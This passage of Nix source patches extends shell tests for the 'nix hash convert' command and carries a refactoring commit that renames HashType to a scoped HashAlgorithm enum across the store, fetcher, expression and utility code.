"$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] @@ -118,7 +118,69 @@ try3() { [ "$h16" = "$2" ] h16=$(nix hash to-base16 "$sri") [ "$h16" = "$2" ] + + # + # Converting from SRI + # + + # Input hash algo auto-detected from SRI and output defaults to SRI as well. + sri=$(nix hash convert "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --from sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --to sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --from sri --to sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --to base64 "$1-$4") + [ "$sri" = "$4" ] + + # + # Auto-detecting the input from algo and length. + # + + sri=$(nix hash convert --algo "$1" "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --algo "$1" "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$4") + [ "$sri" = "$1-$4" ] + + # + # Asserting input format succeeds. + # + + sri=$(nix hash convert --algo "$1" --from base16 "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" --from base32 "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" --from base64 "$4") + [ "$sri" = "$1-$4" ] + + # + # Asserting input format fails. 
+ # + + fail=$(nix hash convert --algo "$1" --from base32 "$2" 2>&1 || echo "exit: $?") + [[ "$fail" == "error: input hash"*"exit: 1" ]] + fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") + [[ "$fail" == "error: input hash"*"exit: 1" ]] + fail=$(nix hash convert --algo "$1" --from base32 "$4" 2>&1 || echo "exit: $?") + [[ "$fail" == "error: input hash"*"exit: 1" ]] + } + try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8=" try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ==" From 5334c9c792a208db4d3824e88019a626ded1b65d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 14:20:27 +0100 Subject: [PATCH 059/654] HashType: Rename to HashAlgorithm To be consistent with CLI, nix API and many other references. As part of this, we also converted it to a scoped enum. 
https://github.com/NixOS/nix/issues/8876 --- perl/lib/Nix/Store.xs | 12 +- src/libexpr/flake/flake.cc | 2 +- src/libexpr/primops.cc | 36 ++--- src/libexpr/primops/fetchMercurial.cc | 4 +- src/libexpr/primops/fetchTree.cc | 8 +- src/libfetchers/fetchers.cc | 6 +- src/libfetchers/git-utils.cc | 4 +- src/libfetchers/git.cc | 6 +- src/libfetchers/github.cc | 10 +- src/libfetchers/indirect.cc | 4 +- src/libfetchers/input-accessor.cc | 4 +- src/libfetchers/mercurial.cc | 10 +- src/libfetchers/tarball.cc | 6 +- src/libstore/binary-cache-store.cc | 24 +-- src/libstore/binary-cache-store.hh | 16 +- src/libstore/build/local-derivation-goal.cc | 42 +++--- src/libstore/build/worker.cc | 4 +- src/libstore/builtins/fetchurl.cc | 4 +- src/libstore/content-address.cc | 28 ++-- src/libstore/content-address.hh | 4 +- src/libstore/daemon.cc | 16 +- src/libstore/derivations.cc | 64 ++++---- src/libstore/derivations.hh | 8 +- src/libstore/downstream-placeholder.cc | 4 +- src/libstore/export-import.cc | 6 +- src/libstore/gc.cc | 2 +- src/libstore/legacy-ssh-store.cc | 14 +- src/libstore/local-store.cc | 30 ++-- src/libstore/local-store.hh | 6 +- src/libstore/make-content-addressed.cc | 4 +- src/libstore/nar-info.cc | 4 +- src/libstore/optimise-store.cc | 4 +- src/libstore/path-references.cc | 2 +- src/libstore/path.cc | 2 +- src/libstore/remote-store.cc | 28 ++-- src/libstore/remote-store.hh | 14 +- src/libstore/store-api.cc | 46 +++--- src/libstore/store-api.hh | 22 +-- src/libstore/store-dir-config.hh | 2 +- src/libstore/worker-protocol.cc | 2 +- src/libutil/args.cc | 14 +- src/libutil/args.hh | 6 +- src/libutil/git.cc | 8 +- src/libutil/git.hh | 6 +- src/libutil/hash.cc | 158 ++++++++++---------- src/libutil/hash.hh | 38 ++--- src/libutil/references.cc | 4 +- src/libutil/references.hh | 2 +- src/libutil/source-accessor.cc | 8 +- src/libutil/source-accessor.hh | 6 +- src/nix-store/nix-store.cc | 12 +- src/nix/add-to-store.cc | 4 +- src/nix/hash.cc | 24 +-- src/nix/prefetch.cc | 34 
++--- src/nix/profile.cc | 2 +- src/nix/verify.cc | 2 +- tests/unit/libstore/common-protocol.cc | 8 +- tests/unit/libstore/derivation.cc | 4 +- tests/unit/libstore/nar-info.cc | 2 +- tests/unit/libstore/path-info.cc | 2 +- tests/unit/libstore/serve-protocol.cc | 8 +- tests/unit/libstore/worker-protocol.cc | 10 +- tests/unit/libutil/git.cc | 8 +- tests/unit/libutil/hash.cc | 16 +- 64 files changed, 450 insertions(+), 450 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 40257ed74..50148141b 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -205,7 +205,7 @@ void importPaths(int fd, int dontCheckSigs) SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashPath(parseHashType(algo), path).first; + Hash h = hashPath(parseHashAlgo(algo), path).first; auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -216,7 +216,7 @@ SV * hashPath(char * algo, int base32, char * path) SV * hashFile(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashFile(parseHashType(algo), path); + Hash h = hashFile(parseHashAlgo(algo), path); auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -227,7 +227,7 @@ SV * hashFile(char * algo, int base32, char * path) SV * hashString(char * algo, int base32, char * s) PPCODE: try { - Hash h = hashString(parseHashType(algo), s); + Hash h = hashString(parseHashAlgo(algo), s); auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -238,7 +238,7 @@ SV * hashString(char * algo, int base32, char * s) SV * convertHash(char * algo, char * s, int toBase32) PPCODE: try { - auto h = Hash::parseAny(s, parseHashType(algo)); + auto h = Hash::parseAny(s, parseHashAlgo(algo)); auto s = h.to_string(toBase32 ? 
HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -281,7 +281,7 @@ SV * addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashType(algo)); + auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -291,7 +291,7 @@ SV * addToStore(char * srcPath, int recursive, char * algo) SV * makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) PPCODE: try { - auto h = Hash::parseAny(hash, parseHashType(algo)); + auto h = Hash::parseAny(hash, parseHashAlgo(algo)); auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; auto path = store()->makeFixedOutputPath(name, FixedOutputInfo { .method = method, diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index 8f8fc64f0..fee58792b 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -904,7 +904,7 @@ Fingerprint LockedFlake::getFingerprint() const // FIXME: as an optimization, if the flake contains a lock file // and we haven't changed it, then it's sufficient to use // flake.sourceInfo.storePath for the fingerprint. 
- return hashString(htSHA256, + return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%d;%d;%s", flake.storePath.to_string(), flake.lockedRef.subdir, diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c2499bdae..7831f3803 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1317,7 +1317,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] })); - auto h = newHashAllowEmpty(*outputHash, parseHashTypeOpt(outputHashAlgo)); + auto h = newHashAllowEmpty(*outputHash, parseHashAlgoOpt(outputHashAlgo)); auto method = ingestionMethod.value_or(FileIngestionMethod::Flat); @@ -1339,7 +1339,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] }); - auto ht = parseHashTypeOpt(outputHashAlgo).value_or(htSHA256); + auto ht = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); for (auto & i : outputs) { @@ -1348,13 +1348,13 @@ drvName, Bindings * attrs, Value & v) drv.outputs.insert_or_assign(i, DerivationOutput::Impure { .method = method, - .hashType = ht, + .hashAlgo = ht, }); else drv.outputs.insert_or_assign(i, DerivationOutput::CAFloating { .method = method, - .hashType = ht, + .hashAlgo = ht, }); } } @@ -1754,17 +1754,17 @@ static RegisterPrimOp primop_findFile(PrimOp { /* Return the cryptographic hash of a file in base-16. 
*/ static void prim_hashFile(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto type = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); - std::optional ht = parseHashType(type); - if (!ht) + auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); + std::optional ha = parseHashAlgo(algo); + if (!ha) state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash type '%1%'", type), + .msg = hintfmt("unknown hash algo '%1%'", algo), .errPos = state.positions[pos] })); auto path = realisePath(state, pos, *args[1]); - v.mkString(hashString(*ht, path.readFile()).to_string(HashFormat::Base16, false)); + v.mkString(hashString(*ha, path.readFile()).to_string(HashFormat::Base16, false)); } static RegisterPrimOp primop_hashFile({ @@ -2341,7 +2341,7 @@ static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value else if (n == "recursive") method = FileIngestionMethod { state.forceBool(*attr.value, attr.pos, "while evaluating the `recursive` attribute passed to builtins.path") }; else if (n == "sha256") - expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), htSHA256); + expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), HashAlgorithm::SHA256); else state.debugThrowLastTrace(EvalError({ .msg = hintfmt("unsupported argument '%1%' to 'addPath'", state.symbols[attr.name]), @@ -3766,18 +3766,18 @@ static RegisterPrimOp primop_stringLength({ /* Return the cryptographic hash of a string in base-16. 
*/ static void prim_hashString(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto type = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); - std::optional ht = parseHashType(type); - if (!ht) + auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); + std::optional ha = parseHashAlgo(algo); + if (!ha) state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash type '%1%'", type), + .msg = hintfmt("unknown hash algo '%1%'", algo), .errPos = state.positions[pos] })); NixStringContext context; // discarded auto s = state.forceString(*args[1], context, pos, "while evaluating the second argument passed to builtins.hashString"); - v.mkString(hashString(*ht, s).to_string(HashFormat::Base16, false)); + v.mkString(hashString(*ha, s).to_string(HashFormat::Base16, false)); } static RegisterPrimOp primop_hashString({ @@ -3800,15 +3800,15 @@ static void prim_convertHash(EvalState & state, const PosIdx pos, Value * * args auto hash = state.forceStringNoCtx(*iteratorHash->value, pos, "while evaluating the attribute 'hash'"); Bindings::iterator iteratorHashAlgo = inputAttrs->find(state.symbols.create("hashAlgo")); - std::optional ht = std::nullopt; + std::optional ha = std::nullopt; if (iteratorHashAlgo != inputAttrs->end()) { - ht = parseHashType(state.forceStringNoCtx(*iteratorHashAlgo->value, pos, "while evaluating the attribute 'hashAlgo'")); + ha = parseHashAlgo(state.forceStringNoCtx(*iteratorHashAlgo->value, pos, "while evaluating the attribute 'hashAlgo'")); } Bindings::iterator iteratorToHashFormat = getAttr(state, state.symbols.create("toHashFormat"), args[0]->attrs, "while locating the attribute 'toHashFormat'"); HashFormat hf = parseHashFormat(state.forceStringNoCtx(*iteratorToHashFormat->value, pos, "while evaluating the attribute 'toHashFormat'")); - v.mkString(Hash::parseAny(hash, ht).to_string(hf, hf == 
HashFormat::SRI)); + v.mkString(Hash::parseAny(hash, ha).to_string(hf, hf == HashFormat::SRI)); } static RegisterPrimOp primop_convertHash({ diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc index e76ce455d..58fe6f173 100644 --- a/src/libexpr/primops/fetchMercurial.cc +++ b/src/libexpr/primops/fetchMercurial.cc @@ -31,7 +31,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a // be both a revision or a branch/tag name. auto value = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `rev` attribute passed to builtins.fetchMercurial"); if (std::regex_match(value.begin(), value.end(), revRegex)) - rev = Hash::parseAny(value, htSHA1); + rev = Hash::parseAny(value, HashAlgorithm::SHA1); else ref = value; } @@ -79,7 +79,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a attrs2.alloc("branch").mkString(*input2.getRef()); // Backward compatibility: set 'rev' to // 0000000000000000000000000000000000000000 for a dirty tree. 
- auto rev2 = input2.getRev().value_or(Hash(htSHA1)); + auto rev2 = input2.getRev().value_or(Hash(HashAlgorithm::SHA1)); attrs2.alloc("rev").mkString(rev2.gitRev()); attrs2.alloc("shortRev").mkString(rev2.gitRev().substr(0, 12)); if (auto revCount = input2.getRevCount()) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 383ec7c58..ef80c634f 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -46,7 +46,7 @@ void emitTreeAttrs( attrs.alloc("shortRev").mkString(rev->gitShortRev()); } else if (emptyRevFallback) { // Backwards compat for `builtins.fetchGit`: dirty repos return an empty sha1 as rev - auto emptyHash = Hash(htSHA1); + auto emptyHash = Hash(HashAlgorithm::SHA1); attrs.alloc("rev").mkString(emptyHash.gitRev()); attrs.alloc("shortRev").mkString(emptyHash.gitShortRev()); } @@ -246,7 +246,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v if (n == "url") url = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the url we should fetch"); else if (n == "sha256") - expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the sha256 of the content we should fetch"), htSHA256); + expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the sha256 of the content we should fetch"), HashAlgorithm::SHA256); else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the name of the content we should fetch"); else @@ -276,7 +276,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v state.debugThrowLastTrace(EvalError("in pure evaluation mode, '%s' requires a 'sha256' argument", who)); // early exit if pinned and already in the store - if (expectedHash && expectedHash->type == htSHA256) { + if (expectedHash && expectedHash->algo == HashAlgorithm::SHA256) { auto expectedPath = state.store->makeFixedOutputPath( 
name, FixedOutputInfo { @@ -301,7 +301,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v if (expectedHash) { auto hash = unpack ? state.store->queryPathInfo(storePath)->narHash - : hashFile(htSHA256, state.store->toRealPath(storePath)); + : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); if (hash != *expectedHash) state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", *url, expectedHash->to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true))); diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 60208619e..573341a3d 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -289,8 +289,8 @@ std::string Input::getType() const std::optional Input::getNarHash() const { if (auto s = maybeGetStrAttr(attrs, "narHash")) { - auto hash = s->empty() ? Hash(htSHA256) : Hash::parseSRI(*s); - if (hash.type != htSHA256) + auto hash = s->empty() ? Hash(HashAlgorithm::SHA256) : Hash::parseSRI(*s); + if (hash.algo != HashAlgorithm::SHA256) throw UsageError("narHash must use SHA-256"); return hash; } @@ -314,7 +314,7 @@ std::optional Input::getRev() const } catch (BadHash &e) { // Default to sha1 for backwards compatibility with existing // usages (e.g. `builtins.fetchTree` calls or flake inputs). 
- hash = Hash::parseAny(*s, htSHA1); + hash = Hash::parseAny(*s, HashAlgorithm::SHA1); } } diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..9356e5817 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -91,7 +91,7 @@ Hash toHash(const git_oid & oid) #ifdef GIT_EXPERIMENTAL_SHA256 assert(oid.type == GIT_OID_SHA1); #endif - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); memcpy(hash.hash, oid.id, hash.hashSize); return hash; } @@ -439,7 +439,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this std::string re = R"(Good "git" signature for \* with .* key SHA256:[)"; for (const fetchers::PublicKey & k : publicKeys){ // Calculate sha256 fingerprint from public key and escape the regex symbol '+' to match the key literally - auto fingerprint = trim(hashString(htSHA256, base64Decode(k.key)).to_string(nix::HashFormat::Base64, false), "="); + auto fingerprint = trim(hashString(HashAlgorithm::SHA256, base64Decode(k.key)).to_string(nix::HashFormat::Base64, false), "="); auto escaped_fingerprint = std::regex_replace(fingerprint, std::regex("\\+"), "\\+" ); re += "(" + escaped_fingerprint + ")"; } diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..a89acc1c0 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -52,7 +52,7 @@ bool touchCacheFile(const Path & path, time_t touch_time) Path getCachePath(std::string_view key) { return getCacheDir() + "/nix/gitv3/" + - hashString(htSHA256, key).to_string(HashFormat::Base32, false); + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Base32, false); } // Returns the name of the HEAD branch. 
@@ -369,7 +369,7 @@ struct GitInputScheme : InputScheme { auto checkHashType = [&](const std::optional & hash) { - if (hash.has_value() && !(hash->type == htSHA1 || hash->type == htSHA256)) + if (hash.has_value() && !(hash->algo == HashAlgorithm::SHA1 || hash->algo == HashAlgorithm::SHA256)) throw Error("Hash '%s' is not supported by Git. Supported types are sha1 and sha256.", hash->to_string(HashFormat::Base16, true)); }; @@ -559,7 +559,7 @@ struct GitInputScheme : InputScheme repoInfo.url ); } else - input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), htSHA1).gitRev()); + input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), HashAlgorithm::SHA1).gitRev()); // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder } diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 661ad4884..70acb9354 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -42,7 +42,7 @@ struct GitArchiveInputScheme : InputScheme auto size = path.size(); if (size == 3) { if (std::regex_match(path[2], revRegex)) - rev = Hash::parseAny(path[2], htSHA1); + rev = Hash::parseAny(path[2], HashAlgorithm::SHA1); else if (std::regex_match(path[2], refRegex)) ref = path[2]; else @@ -68,7 +68,7 @@ struct GitArchiveInputScheme : InputScheme if (name == "rev") { if (rev) throw BadURL("URL '%s' contains multiple commit hashes", url.url); - rev = Hash::parseAny(value, htSHA1); + rev = Hash::parseAny(value, HashAlgorithm::SHA1); } else if (name == "ref") { if (!std::regex_match(value, refRegex)) @@ -284,7 +284,7 @@ struct GitHubInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string { json["sha"] }, htSHA1); + auto rev = Hash::parseAny(std::string { json["sha"] }, HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", url, rev.gitRev()); 
return rev; } @@ -356,7 +356,7 @@ struct GitLabInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1); + auto rev = Hash::parseAny(std::string(json[0]["id"]), HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", url, rev.gitRev()); return rev; } @@ -448,7 +448,7 @@ struct SourceHutInputScheme : GitArchiveInputScheme if(!id) throw BadURL("in '%d', couldn't find ref '%d'", input.to_string(), ref); - auto rev = Hash::parseAny(*id, htSHA1); + auto rev = Hash::parseAny(*id, HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", fmt("%s/%s", base_url, ref), rev.gitRev()); return rev; } diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc index 8e30284c6..002c0c292 100644 --- a/src/libfetchers/indirect.cc +++ b/src/libfetchers/indirect.cc @@ -20,7 +20,7 @@ struct IndirectInputScheme : InputScheme if (path.size() == 1) { } else if (path.size() == 2) { if (std::regex_match(path[1], revRegex)) - rev = Hash::parseAny(path[1], htSHA1); + rev = Hash::parseAny(path[1], HashAlgorithm::SHA1); else if (std::regex_match(path[1], refRegex)) ref = path[1]; else @@ -31,7 +31,7 @@ struct IndirectInputScheme : InputScheme ref = path[1]; if (!std::regex_match(path[2], revRegex)) throw BadURL("in flake URL '%s', '%s' is not a commit hash", url.url, path[2]); - rev = Hash::parseAny(path[2], htSHA1); + rev = Hash::parseAny(path[2], HashAlgorithm::SHA1); } else throw BadURL("GitHub URL '%s' is invalid", url.url); diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 85dc4609f..eabef55d8 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -44,8 +44,8 @@ StorePath InputAccessor::fetchToStore( auto storePath = settings.readOnlyMode - ? 
store->computeStorePathFromDump(*source, name, method, htSHA256).first - : store->addToStoreFromDump(*source, name, method, htSHA256, repair); + ? store->computeStorePathFromDump(*source, name, method, HashAlgorithm::SHA256).first + : store->addToStoreFromDump(*source, name, method, HashAlgorithm::SHA256, repair); if (cacheKey) fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index aa991a75d..713f24bbb 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -210,7 +210,7 @@ struct MercurialInputScheme : InputScheme return files.count(file); }; - auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, htSHA256, filter); + auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, filter); return {std::move(storePath), input}; } @@ -220,7 +220,7 @@ struct MercurialInputScheme : InputScheme auto checkHashType = [&](const std::optional & hash) { - if (hash.has_value() && hash->type != htSHA1) + if (hash.has_value() && hash->algo != HashAlgorithm::SHA1) throw Error("Hash '%s' is not supported by Mercurial. 
Only sha1 is supported.", hash->to_string(HashFormat::Base16, true)); }; @@ -260,14 +260,14 @@ struct MercurialInputScheme : InputScheme }); if (auto res = getCache()->lookup(store, unlockedAttrs)) { - auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), htSHA1); + auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), HashAlgorithm::SHA1); if (!input.getRev() || input.getRev() == rev2) { input.attrs.insert_or_assign("rev", rev2.gitRev()); return makeResult(res->first, std::move(res->second)); } } - Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(htSHA256, actualUrl).to_string(HashFormat::Base32, false)); + Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Base32, false)); /* If this is a commit hash that we already have, we don't have to pull again. */ @@ -301,7 +301,7 @@ struct MercurialInputScheme : InputScheme runHg({ "log", "-R", cacheDir, "-r", revOrRef, "--template", "{node} {rev} {branch}" })); assert(tokens.size() == 3); - input.attrs.insert_or_assign("rev", Hash::parseAny(tokens[0], htSHA1).gitRev()); + input.attrs.insert_or_assign("rev", Hash::parseAny(tokens[0], HashAlgorithm::SHA1).gitRev()); auto revCount = std::stoull(tokens[1]); input.attrs.insert_or_assign("ref", tokens[2]); diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc index 0062878a9..086366180 100644 --- a/src/libfetchers/tarball.cc +++ b/src/libfetchers/tarball.cc @@ -73,7 +73,7 @@ DownloadFileResult downloadFile( } else { StringSink sink; dumpString(res.data, sink); - auto hash = hashString(htSHA256, res.data); + auto hash = hashString(HashAlgorithm::SHA256, res.data); ValidPathInfo info { *store, name, @@ -82,7 +82,7 @@ DownloadFileResult downloadFile( .hash = hash, .references = {}, }, - hashString(htSHA256, sink.s), + hashString(HashAlgorithm::SHA256, sink.s), }; info.narSize = sink.s.size(); auto source = StringSource { sink.s }; @@ -156,7 +156,7 @@ DownloadTarballResult 
downloadTarball( throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url); auto topDir = tmpDir + "/" + members.begin()->name; lastModified = lstat(topDir).st_mtime; - unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, htSHA256, defaultPathFilter, NoRepair); + unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, defaultPathFilter, NoRepair); } Attrs infoAttrs({ diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index ae483c95e..f287d72a8 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -143,9 +143,9 @@ ref BinaryCacheStore::addToStoreCommon( /* Read the NAR simultaneously into a CompressionSink+FileSink (to write the compressed NAR to disk), into a HashSink (to get the NAR hash), and into a NarAccessor (to get the NAR listing). */ - HashSink fileHashSink { htSHA256 }; + HashSink fileHashSink { HashAlgorithm::SHA256 }; std::shared_ptr narAccessor; - HashSink narHashSink { htSHA256 }; + HashSink narHashSink { HashAlgorithm::SHA256 }; { FdSink fileSink(fdTemp.get()); TeeSink teeSinkCompressed { fileSink, fileHashSink }; @@ -301,9 +301,9 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, Source & narSource } StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { - if (method != FileIngestionMethod::Recursive || hashAlgo != htSHA256) + if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) unsupported("addToStoreFromDump"); return addToStoreCommon(dump, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { @@ -399,13 +399,13 @@ void BinaryCacheStore::queryPathInfoUncached(const StorePath & 
storePath, } StorePath BinaryCacheStore::addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) { /* FIXME: Make BinaryCacheStore::addToStoreCommon support non-recursive+sha256 so we can just use the default @@ -448,7 +448,7 @@ StorePath BinaryCacheStore::addTextToStore( const StorePathSet & references, RepairFlag repair) { - auto textHash = hashString(htSHA256, s); + auto textHash = hashString(HashAlgorithm::SHA256, s); auto path = makeTextPath(name, TextInfo { { textHash }, references }); if (!repair && isValidPath(path)) diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index cea2a571f..395e1b479 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -124,16 +124,16 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) override; + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const 